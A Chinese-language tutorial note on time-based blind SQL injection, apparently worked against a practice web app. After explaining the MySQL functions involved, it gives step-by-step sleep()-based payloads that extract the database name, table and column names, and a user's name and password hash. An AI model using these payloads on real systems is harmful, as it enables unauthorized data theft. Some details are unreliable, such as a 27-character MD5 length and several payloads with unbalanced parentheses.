sql注入笔记:基于时间延迟的盲注
“ 在陷入混乱的一瞬间,灯火、信仰、统统派不上用场。”
大致原理:
遇到一些可能没有报错或结果的疑似sql注入点,可以采用sleep函数延时和if判定的方式进行注入,应该属于盲注的一种,很好理解
就是猜对了就执行sleep,没对就不执行
使用到的函数:
sleep()
用法(语法):sleep(duration),其中duration的单位是秒。
ascii(string)
功能: 数据库字符集返回string的第一个字节的十进制表示。
substr(string,start [,length])
第一个参数为要处理的字符串,start为开始位置,length为截取的长度。
count(column_name)
函数返回指定列的值的数目(NULL 不计入)。
limit [offset,] rows
offset是偏移量,表示我们现在需要的数据是跳过多少行数据之后的,可以忽略;
rows表示我们现在要拿多少行数据。
IF( expr1 , expr2 , expr3 )
expr1 的值为 TRUE,则返回值为 expr2
expr1 的值为FALSE,则返回值为 expr3
注入流程
1,常规手段判断注入点
1' and 1=1
2,判断注入类型
1' and sleep(5) # #延迟
1 and sleep(5) # #没有延迟
#所以得出存在字符型注入
3,猜解当前数据库名
猜解数据库名的长度:
1' and if(length(database())=1,sleep(5),1) # #没有延迟
1' and if(length(database())=4,sleep(5),1) # #延迟
#说明数据库名长度为4个字符。
采用二分法猜解数据库名(传统艺能):
1' and if(ascii(substr(database(),1,1))>97,sleep(5),1) # #延迟
1' and if(ascii(substr(database(),1,1))<100,sleep(5),1)# #没有延迟
1' and if(ascii(substr(database(),1,1))>100,sleep(5),1) # #没有延迟
#说明数据库的第一个字符为小写字母d(ASCII码:100)
#重复上述步骤,就能猜解出数据库名。
4,猜解数据库的表名
先猜解数据库中表的数量:
1' and if((select count(table_name) from information_schema.tables where table_schema=database())=1,sleep(5),1)
1' and if(select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(5),1)
接着猜解表名长度:
1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1,sleep(5),1)
1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1)
然后猜解表名:
1' and if((select ascii(substr((select table_name from information_schema.tables where table_schema= database() limit 0,1),1,1)))>97,sleep(5),1) # #延迟
1' and if((select ascii(substr((select table_name from information_schema.tables where table_schema= database() limit 0,1),1,1)))<100,sleep(5),1) # #没有延迟
1' and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=103,sleep(5),1) # #延迟
#表名的第一个字符为g(ASCII码:103),照此方法依次猜出表名。
例中,得出这两个表依次为:guestbook、users.
5,由表名猜字段名
先猜字段数:
1' and if((select count(column_name) from information_schema.columns where table_name= “users”)=1,sleep(5),1)
1' and if((select count(column_name) from information_schema.columns where table_name= “users”)=9,sleep(5),1)
猜字段名
1' and if((select ascii(substr((select column_name from information_schema.columns where table_name=”users” limit 0,1),1,1)))>97, sleep(5),0) # #延迟
1' and if((select ascii(substr((select column_name from information_schema.columns where table_name=”users” limit 0,1),1,1)))<105, sleep(5),0) # #延迟
1' and if((select ascii(substr((select column_name from information_schema.columns where table_name=”users” limit 0,1),1,1)))=117, sleep(5),0) # #延迟
#依次类推可得表中所有字段名
例中:字段名为:user、password.
6,猜解user和password的值的长度
第一个用户名字符长
1' and if((select (length(substr((select user from users limit 0,1),1))=1) ,sleep(5),1)
1' and if((select (length(substr((select user from users limit 0,1),1))=5) ,sleep(5),1)
第一个用户名的password的md5字段长
1' and if((select (length(substr((select password from users limit 0,1),1))=1) ,sleep(5),1)
1' and if((select (length(substr((select password from users limit 0,1),1))=27) ,sleep(5),1)
第一个用户名:
1' and if(select ascii(substr((select user from users limit 0,1),1,1))>97,sleep(5),1) # 没有延迟
1' and if(select ascii(substr((select user from users limit 0,1),1,1))=97,sleep(5),1) # 延迟
#依次猜解得第一个用户名为admin
第一个用户的密码
1' and if(select ascii(substr((select password from users limit 0,1),1,1))>97,sleep(5),1) # #没有延时
1' and if(select ascii(substr((select password from users limit 0,1),1,1))=53,sleep(5),1) # #延时
#依次猜解密码的md5值
一键关注带来更多干货【也许】